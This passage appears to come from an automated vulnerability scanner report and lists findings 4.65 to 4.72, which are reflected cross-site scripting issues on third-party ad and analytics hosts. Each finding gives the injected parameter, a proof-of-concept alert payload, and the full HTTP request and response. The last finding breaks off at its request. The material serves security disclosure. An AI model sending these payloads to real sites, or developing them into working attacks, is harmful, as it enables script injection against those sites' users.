GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9yZWZlcnJlciI6ICJodHRwOi8vd3d3Lm1hdnNtb25leWJhbGwuY29tL21hdmVyaWNrcy10aWNrZXRzIiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwibXBfcGFnZSI6ICJodHRwOi8vd3d3LnRpcWlxLmNvbS9UaXFpcS9QdWJsaXNoZXJIb21lUGFnZS5hc3B4P1BlcmZvcm1lcklkcz01MTM7SW5jbEF3YXlHYW1lcyZQdWJsaXNoZXJJRD0xMDExMDMxJkJyYW5kSUQ9RW1wdHkmRXZlbnRDb3VudD01IiwidG9rZW4iOiAiY2QwYTRlMWZkOGQ5ZDIyYTg0NjMwY2IyODBkMjU5MzkiLCJ0aW1lIjogMTMwNzk2MzY1NH19&ip=1&callback=mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979&_=1307963654720 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:22:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:22:13 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 71

mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979(1);

4.65. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload dadcf<script>alert(1)</script>f22f0674cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3&n=ar_int_p20101109&1307963612571 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3("");

4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/iabplayer.php

Issue detail

The value of the clickTagURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 226ca"><script>alert(1)</script>5089f9eb91 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com226ca"><script>alert(1)</script>5089f9eb91&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 2196
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
hYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com226ca"><script>alert(1)</script>5089f9eb91" target="_blank">
...[SNIP]...

4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4e5'%3balert(1)//1db1bc5fdae was submitted in the adThumbnail parameter. This input was echoed as 3f4e5';alert(1)//1db1bc5fdae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5'%3balert(1)//1db1bc5fdae&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:00 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
<img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5';alert(1)//1db1bc5fdae" border="0" width="300" height="250" alt="" />
...[SNIP]...

4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561f6"-alert(1)-"9fdd048afed was submitted in the adThumbnail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:58 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
estartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL=&jvxSessionId=1307963038.2661");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}


4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adVideoURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fef19"-alert(1)-"98015cf2c17 was submitted in the adVideoURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
te=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17&jvxSessionId=1307963045.8136");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}


4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the autoPlay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd00"-alert(1)-"646a0cac324 was submitted in the autoPlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:20 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxup
...[SNIP]...

4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab7c"-alert(1)-"c02051b26b was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
p://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c841c'%3balert(1)//719d9a49b95 was submitted in the clickTagURL parameter. This input was echoed as c841c';alert(1)//719d9a49b95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

